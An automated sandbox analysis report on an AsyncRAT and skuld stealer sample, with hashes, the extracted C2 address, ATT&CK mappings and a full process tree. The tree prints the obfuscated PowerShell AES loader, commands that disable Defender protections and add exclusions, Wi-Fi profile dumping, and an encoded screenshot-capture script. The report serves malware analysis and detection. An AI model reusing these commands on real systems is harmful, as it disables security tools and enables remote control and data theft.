asyncrat | 29ced2fe633060e11ec10a236f8085a34cb8448ea7054cf6e8667ce7f7b4897f

Analysis

max time kernel
14s
max time network
27s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
14/07/2024, 21:54

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Infected1.exe
Size

14.0MB
MD5

6e8f03f7fe2e82665e55c2626ea06ef1
SHA1

35f635cafedaa480d8f606153003bdb016914cbc
SHA256

29ced2fe633060e11ec10a236f8085a34cb8448ea7054cf6e8667ce7f7b4897f
SHA512

366285e599e445ea3b11645708f047bebd5e8f51a4ea5767d93d5353e976161ac3c5da3a555d50606df395b6e195a3ca331e543aab1c1ed16287728a9ef8cf63
SSDEEP

393216:jc6lGw0Y6m3aj2Kpj1caTF6n7mhbbmiyrEDxC:wtuFK6Kpjun7mBldC

Score

10^/10

asyncrat default execution rat

Malware Config

Extracted

Family

asyncrat

Botnet

Default

127.0.0.1:7620

matter-ivory.gl.at.ply.gg:7620

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Async RAT payload 2 IoCs

rat

resource	yara_rule
behavioral2/memory/1072-143-0x0000000007550000-0x0000000007566000-memory.dmp	family_asyncrat
behavioral2/files/0x000200000001e790-148.dat	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3848	powershell.exe
1072	powershell.exe
4744	powershell.exe
4264	powershell.exe
4272	powershell.exe
4680	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	Infected1.exe

Executes dropped EXE 2 IoCs

pid	Process
1376	Infected.exe
2084	skuld.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
32	discord.com
16	discord.com
18	discord.com
30	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
21	ip-api.com
41	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2156	wmic.exe
3584	wmic.exe

GoLang User-Agent 2 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	22	Go-http-client/1.1
HTTP User-Agent header	42	Go-http-client/1.1

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3848	powershell.exe
3848	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3848	powershell.exe
Token: SeDebugPrivilege	2084	skuld.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 4632 wrote to memory of 2272	4632	Infected1.exe	86
PID 4632 wrote to memory of 2272	4632	Infected1.exe	86
PID 4632 wrote to memory of 2272	4632	Infected1.exe	86
PID 2272 wrote to memory of 2668	2272	cmd.exe	89
PID 2272 wrote to memory of 2668	2272	cmd.exe	89
PID 2272 wrote to memory of 2668	2272	cmd.exe	89
PID 2272 wrote to memory of 3848	2272	cmd.exe	90
PID 2272 wrote to memory of 3848	2272	cmd.exe	90
PID 2272 wrote to memory of 3848	2272	cmd.exe	90
PID 3848 wrote to memory of 1376	3848	powershell.exe	92
PID 3848 wrote to memory of 1376	3848	powershell.exe	92
PID 3848 wrote to memory of 1376	3848	powershell.exe	92
PID 3848 wrote to memory of 2084	3848	powershell.exe	91
PID 3848 wrote to memory of 2084	3848	powershell.exe	91
PID 2084 wrote to memory of 2764	2084	skuld.exe	93
PID 2084 wrote to memory of 2764	2084	skuld.exe	93

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2692	attrib.exe
3320	attrib.exe
3932	attrib.exe
2764	attrib.exe
3464	attrib.exe
4540	attrib.exe
4184	attrib.exe
1636	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Infected1.exe
"C:\Users\Admin\AppData\Local\Temp\Infected1.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4632
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\Infected1.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jIHFJlpFax/g5Tl6NFogGxlvEHqkNww54xhH1m2siSg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bg/ynoybSTcrBvMXtDXN0Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DHfse=New-Object System.IO.MemoryStream(,$param_var); $KvAZV=New-Object System.IO.MemoryStream; $lsHES=New-Object System.IO.Compression.GZipStream($DHfse, [IO.Compression.CompressionMode]::Decompress); $lsHES.CopyTo($KvAZV); $lsHES.Dispose(); $DHfse.Dispose(); $KvAZV.Dispose(); $KvAZV.ToArray();}function execute_function($param_var,$param2_var){ $XqXPw=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XFnSe=$XqXPw.EntryPoint; $XFnSe.Invoke($null, $param2_var);}$kUkBx = 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\Infected1.bat';$host.UI.RawUI.WindowTitle = $kUkBx;$HdQdv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($kUkBx).Split([Environment]::NewLine);foreach ($XaqAI in $HdQdv) { if ($XaqAI.StartsWith('AjsZKlntHESYEupSfPjf')) { $ywJdG=$XaqAI.Substring(20); break; }}$payloads_var=[string[]]$ywJdG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:2668
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3848
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2084
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe
        5⤵
        Views/modifies file attributes
        
        PID:2764
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4744
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic os get Caption
        5⤵
        
        PID:4652
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
        5⤵
        Views/modifies file attributes
        
        PID:3464
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic cpu get Name
        5⤵
        
        PID:3704
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:2156
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        
        PID:1924
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic csproduct get UUID
        5⤵
        
        PID:4268
    - - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Views/modifies file attributes
        
        PID:4540
    - - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Views/modifies file attributes
        
        PID:4184
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        
        PID:3840
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4272
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aoy1jcul\aoy1jcul.cmdline"
        6⤵
        
        PID:4420
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES105.tmp" "c:\Users\Admin\AppData\Local\Temp\aoy1jcul\CSCF3362D6BBA4422A964D6DC87ED6510.TMP"
        7⤵
        
        PID:404
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Infected.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Infected.exe"
      4⤵
      Executes dropped EXE
      PID:1376
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\Infected.bat" "
        5⤵
        
        PID:2944
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zf2tMBcGp3hwF4FZUItmcIgUcPp+j72YioWbRlDJta4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bO8cIdciqhKkrYo83c3cUQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $nVxAI=New-Object System.IO.MemoryStream(,$param_var); $BIIJJ=New-Object System.IO.MemoryStream; $Yvhyo=New-Object System.IO.Compression.GZipStream($nVxAI, [IO.Compression.CompressionMode]::Decompress); $Yvhyo.CopyTo($BIIJJ); $Yvhyo.Dispose(); $nVxAI.Dispose(); $BIIJJ.Dispose(); $BIIJJ.ToArray();}function execute_function($param_var,$param2_var){ $gxqAr=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NltzE=$gxqAr.EntryPoint; $NltzE.Invoke($null, $param2_var);}$nwWil = 'C:\Users\Admin\AppData\Local\Temp\RarSFX1\Infected.bat';$host.UI.RawUI.WindowTitle = $nwWil;$DprSi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($nwWil).Split([Environment]::NewLine);foreach ($dZZtp in $DprSi) { if ($dZZtp.StartsWith('vqImMRbNlIuMBiftLQqW')) { $igWwD=$dZZtp.Substring(20); break; }}$payloads_var=[string[]]$igWwD.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        6⤵
        
        PID:4788
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1072
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\Infected.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Infected.exe"
        7⤵
        
        PID:2356
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\skuld.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\skuld.exe"
        7⤵
        
        PID:4232
        
        C:\Windows\system32\attrib.exe
        
        attrib +h +s C:\Users\Admin\AppData\Local\Temp\RarSFX1\skuld.exe
        8⤵
        Views/modifies file attributes
        
        PID:1636
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\RarSFX1\skuld.exe
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4264
        
        C:\Windows\System32\Wbem\wmic.exe
        
        wmic os get Caption
        8⤵
        
        PID:2132
        
        C:\Windows\system32\attrib.exe
        
        attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
        8⤵
        Views/modifies file attributes
        
        PID:2692
        
        C:\Windows\System32\Wbem\wmic.exe
        
        wmic cpu get Name
        8⤵
        
        PID:1724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        8⤵
        
        PID:2924
        
        C:\Windows\System32\Wbem\wmic.exe
        
        wmic path win32_VideoController get name
        8⤵
        Detects videocard installed
        
        PID:3584
        
        C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        8⤵
        Views/modifies file attributes
        
        PID:3320
        
        C:\Windows\System32\Wbem\wmic.exe
        
        wmic csproduct get UUID
        8⤵
        
        PID:3992
        
        C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        8⤵
        Views/modifies file attributes
        
        PID:3932
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        8⤵
        
        PID:448
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4680
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ku4eim0a\ku4eim0a.cmdline"
        9⤵
        
        PID:1716
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1C1E.tmp" "c:\Users\Admin\AppData\Local\Temp\ku4eim0a\CSC392E2F98A114C6DB12CDC7A62D03F5F.TMP"
        10⤵
        
        PID:2788

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

